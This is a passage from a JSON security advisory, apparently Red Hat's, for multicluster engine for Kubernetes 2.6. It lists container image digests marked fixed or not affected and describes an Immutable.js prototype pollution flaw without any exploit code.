2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445291"}], "notes": [{"category": "description", "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).", "title": "Vulnerability description"}, {"category": "summary", "text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution", "title": "Vulnerability summary"}, {"category": "other", "text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": 